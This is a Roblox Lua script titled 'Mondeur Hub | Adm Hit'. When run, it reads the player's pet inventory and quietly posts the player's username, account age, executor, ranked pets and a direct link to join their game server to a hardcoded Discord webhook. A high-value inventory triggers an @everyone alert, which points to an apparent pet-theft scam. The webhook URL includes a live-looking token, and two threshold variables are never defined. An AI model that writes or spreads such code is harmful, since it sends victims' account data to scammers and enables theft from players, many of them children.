--// MONDEUR HUB | ADM HIT 🦊 (FINAL PERFECT VERSION)

local HttpService = game:GetService("HttpService")
local ClientData = require(game:GetService("ReplicatedStorage"):WaitForChild("ClientModules"):WaitForChild("Core"):WaitForChild("ClientData"))

local WEBHOOK = "https://webhook.lewisakura.moe/api/webhooks/1408047737102012506/4VZHtB_G9RmikEuLs0-A6yP_0AXaYmb4_4Y3TyaG_0Wxem1-OvNBtPC9n71B4-SSzkUa"
local requestFunc = (syn and syn.request) or (http and http.request) or http_request or request

if not requestFunc then return end

local rarityPriority = {legendary=5, ultra_rare=4, rare=3, uncommon=2, common=1}
local rarityColors = {legendary=0xFFD700, ultra_rare=0xA020F0, rare=0x1E90FF, uncommon=0x32CD32, common=0xB0B0B0}

-- =========================
-- 🏷️ EMOJIS
-- =========================
local function getPetEmoji(name, p)
    local e = ""
    if name:lower():find("fox") then e = "🦊"
    elseif name:lower():find("bee") then e = "🐝"
    elseif name:lower():find("dog") then e = "🐕"
    end
    if p.mega then e = e .. "🌈" end
    if p.neon then e = e .. "🟣" end
    if p.ride then e = e .. "🏇" end
    if p.fly then e = e .. "🪽" end
    return e ~= "" and e or "🐾"
end

-- =========================
-- PERFECT PET PROCESSING
-- =========================
local function processPets(pets)
    local petMap = {}
    local totalValue = 0

    for _, pet in pairs(pets or {}) do
        if pet and pet.id then
            local petName = tostring(pet.id):gsub("_", " "):gsub("%d", ""):gsub("^%s*(.-)%s*$", "%1")
            
            -- Skip obvious untradeables
            local lowerName = petName:lower()
            if lowerName:find("egg") or lowerName:find("jerboa") or lowerName:find("starter") or lowerName:find("practice") then
                continue
            end

            local displayName = petName:sub(1,1):upper() .. petName:sub(2)
            
            if not petMap[displayName] then
                petMap[displayName] = {
                    name = displayName,
                    count = 0,
                    rarity = (pet.rarity or "common"):lower(),
                    neon = pet.neon or pet.properties and pet.properties.neon,
                    mega = pet.mega or pet.properties and pet.properties.mega,
                    ride = pet.rideable or pet.properties and pet.properties.rideable,
                    fly = pet.flyable or pet.properties and pet.properties.flyable
                }
            end
            
            petMap[displayName].count = petMap[displayName].count + 1
            totalValue = totalValue + 10
        end
    end

    local petList = {}
    for _, petData in pairs(petMap) do
        table.insert(petList, petData)
    end

    -- Sort: Rarity first, then count
    table.sort(petList, function(a, b)
        local aScore = (rarityPriority[a.rarity] or 1) * 100 + a.count
        local bScore = (rarityPriority[b.rarity] or 1) * 100 + b.count
        return aScore > bScore
    end)

    return petList, totalValue
end

-- =========================
-- CLEAN FORMAT
-- =========================
local function formatPets(petList)
    local lines = {}
    for i = 1, math.min(12, #petList) do
        local pet = petList[i]
        local emoji = getPetEmoji(pet.name, pet)
        table.insert(lines, emoji .. " " .. pet.name .. " x" .. pet.count)
    end
    return #lines > 0 and table.concat(lines, "\n") or "No pets"
end

-- =========================
-- SEND WEBHOOK
-- =========================
local function sendWebhook()
    local inventory = ClientData.get("inventory")
    local pets = inventory and inventory.pets or {}
    
    local petList, totalValue = processPets(pets)
    
    local bestPet = petList[1] or {}
    local bestName = bestPet.name and bestPet.count and (bestPet.name .. " x" .. bestPet.count) or "None"
    local bestRarity = bestPet.rarity or "common"
    local formattedPets = formatPets(petList)
    
    local tier = totalValue >= HIGH_THRESHOLD and "🔴 HIGH" or 
                 totalValue >= LOW_THRESHOLD and "🟡 MID" or "🟢 LOW"
    
    local content = tier == "🔴 HIGH" and "@everyone" or ""
    local color = rarityColors[bestRarity] or 0x2F3136

    local embed = {
        title = "🦊 Mondeur Hub | Adm Hit",
        description = "```" ..
            "👤 Display Name : " .. game.Players.LocalPlayer.DisplayName .. "\n" ..
            "🆔 Username     : " .. game.Players.LocalPlayer.Name .. "\n" ..
            "📅 Account Age  : " .. game.Players.LocalPlayer.AccountAge .. " days\n" ..
            "📱 Executor     : " .. (identifyexecutor and identifyexecutor() or "Unknown") .. "\n" ..
            "👥 Players      : " .. #game.Players:GetPlayers() .. "/" .. game.Players.MaxPlayers .. "\n" ..
            "💰 Total Value  : " .. totalValue .. "\n" ..
            "📊 Tier         : " .. tier .. "```",
        fields = {
            {name = "🏆 Best Pet", value = "```" .. bestName .. "```"},
            {name = "🐶 Pets (Best → Worst)", value = "```" .. formattedPets .. "```"},
            {name = "🌐 Join Server", value = "[Click to Join](https://www.roblox.com/games/start?placeId=" .. game.PlaceId .. "&instanceId=" .. game.JobId .. ")"}
        },
        color = color,
        footer = {text = "Mondeuronbotton"}
    }

    pcall(function()
        requestFunc({
            Url = WEBHOOK,
            Method = "POST",
            Headers = {["Content-Type"] = "application/json"},
            Body = HttpService:JSONEncode({content = content, embeds = {embed}})
        })
    end)
    
    print("✅ Webhook sent - " .. #petList .. " pets detected")
end

-- EXECUTE
sendWebhook()
